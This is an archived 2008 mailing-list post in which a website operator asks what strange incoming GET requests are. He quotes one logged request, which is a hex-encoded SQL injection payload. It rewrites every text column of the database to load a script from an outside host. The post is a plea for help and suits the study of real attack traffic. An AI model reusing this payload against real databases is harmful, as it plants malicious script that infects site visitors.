ontolog-forum
[Top] [All Lists]

[ontolog-forum] Commands Sent to an FeaReferenceModelOntology

To: semantic_web@xxxxxxxxxxxxxxxx, SW-forum <semantic-web@xxxxxx>, semanticweb@xxxxxxxxxxxxxxx, "[ontolog-forum]" <ontolog-forum@xxxxxxxxxxxxxxxx>
From: "Adrian Walker" <adriandwalker@xxxxxxxxx>
Date: Fri, 15 Aug 2008 13:42:12 -0400
Message-id: <1e89d6a40808151042s1218466ua66417ad160466fb@xxxxxxxxxxxxxx>
Hi All --

Your expert advice please.

On our website [1], we support a kind of Wiki for business rules and facts, written in executable English. 

The site can also be used as an SOA endpoint.

One of the sets of rules and facts on the site is a version of the FeaReferenceModelOntology.

We are seeing incoming GET commands like the one listed below.

 [15/Aug/2008:13:10:57 -0400] "GET /demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 620290

The commands originate from many different sites around the internet, and we have not been able to find out why they are being sent.

Does anyone know please what these commands are trying to do?  Or are they simply buffer overflow attack attempts?

Thanks for your kind thoughts about this, and apologies for cross posting.

                                                   -- Adrian

[1]  Internet Business Logic
A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL and RDF
Online at www.reengineeringllc.com    Shared use is free

Adrian Walker
Reengineering


_________________________________________________________________
Message Archives: http://ontolog.cim3.net/forum/ontolog-forum/  
Subscribe/Config: http://ontolog.cim3.net/mailman/listinfo/ontolog-forum/  
Unsubscribe: mailto:ontolog-forum-leave@xxxxxxxxxxxxxxxx
Shared Files: http://ontolog.cim3.net/file/
Community Wiki: http://ontolog.cim3.net/wiki/ 
To Post: mailto:ontolog-forum@xxxxxxxxxxxxxxxx    (01)

<Prev in Thread] Current Thread [Next in Thread>